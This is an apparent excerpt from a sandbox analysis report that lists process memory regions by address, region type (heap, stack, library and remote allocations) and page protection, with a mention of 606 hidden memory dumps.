||
|
95C0000
|
direct allocation
|
page execute and read and write
|
||
|
3190000
|
heap
|
page read and write
|
||
|
8BC0000
|
heap
|
page read and write
|
||
|
2087CA8F000
|
trusted library allocation
|
page read and write
|
||
|
20877C02000
|
heap
|
page read and write
|
||
|
3100000
|
heap
|
page read and write
|
||
|
2087CAF0000
|
trusted library allocation
|
page read and write
|
||
|
3540000
|
heap
|
page read and write
|
||
|
7DF0000
|
trusted library allocation
|
page read and write
|
||
|
CB0000
|
heap
|
page read and write
|
||
|
210ACD1D000
|
trusted library allocation
|
page read and write
|
||
|
20878450000
|
trusted library section
|
page readonly
|
||
|
210AC972000
|
heap
|
page read and write
|
||
|
D52E6FF000
|
stack
|
page read and write
|
||
|
7FFD9B8ED000
|
trusted library allocation
|
page execute and read and write
|
||
|
215BE000
|
stack
|
page read and write
|
||
|
20877D1A000
|
heap
|
page read and write
|
||
|
57D0000
|
direct allocation
|
page read and write
|
||
|
210AAC67000
|
heap
|
page read and write
|
||
|
3080000
|
heap
|
page read and write
|
||
|
3166000
|
heap
|
page read and write
|
||
|
7B0E000
|
heap
|
page read and write
|
||
|
7FFD9BC70000
|
trusted library allocation
|
page read and write
|
||
|
33BF000
|
stack
|
page read and write
|
||
|
2087CB14000
|
trusted library allocation
|
page read and write
|
||
|
5A1E000
|
heap
|
page read and write
|
||
|
2087CB27000
|
trusted library allocation
|
page read and write
|
||
|
5938000
|
heap
|
page read and write
|
||
|
210C4E8F000
|
heap
|
page read and write
|
||
|
58E0000
|
direct allocation
|
page read and write
|
||
|
D52DD7E000
|
unkown
|
page readonly
|
||
|
20877D13000
|
heap
|
page read and write
|
||
|
2087CAF0000
|
trusted library allocation
|
page read and write
|
||
|
2087C89A000
|
heap
|
page read and write
|
||
|
21280000
|
remote allocation
|
page read and write
|
||
|
9AB310A000
|
stack
|
page read and write
|
There are 606 hidden memdumps, click here to show them.